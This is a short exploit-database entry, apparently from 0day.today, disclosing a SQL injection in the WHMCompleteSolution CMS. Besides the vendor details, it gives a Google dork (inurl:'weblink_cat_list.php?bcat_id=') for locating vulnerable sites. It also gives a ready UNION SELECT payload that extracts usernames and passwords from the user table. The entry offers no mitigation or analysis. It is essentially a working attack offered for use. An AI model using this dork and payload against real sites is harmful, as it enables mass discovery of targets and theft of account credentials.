id: 10280
date: 12/16/2009
title: WHMCompleteSolution CMS sql Injection Vulnerability
author: Dr.0rYX
cves: 

===================================================
WHMCompleteSolution CMS sql Injection Vulnerability
===================================================

***************************************************************************/
 
[ Software Information ]
 
[+] Vendor : http://www.siamhostserver.com/whmcs/
[+] script   : WHMCompleteSolution CMS
[+] Download : http://www.siamhostserver.com/whmcs/ (sell script)
[+] Vulnerability : php SQL injection
[+] Dork :inurl:"weblink_cat_list.php?bcat_id="
 
**************************************************************************/
[ Vulnerable File ]
 
http://server/weblink_cat_list.php?bcat_id=[N.A.S.T ]
 
[ Exploit ]
 
http://server/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat(id,0x3a,username,0x3a,password),3,4+from+user



#  0day.today [2023-03-25]  #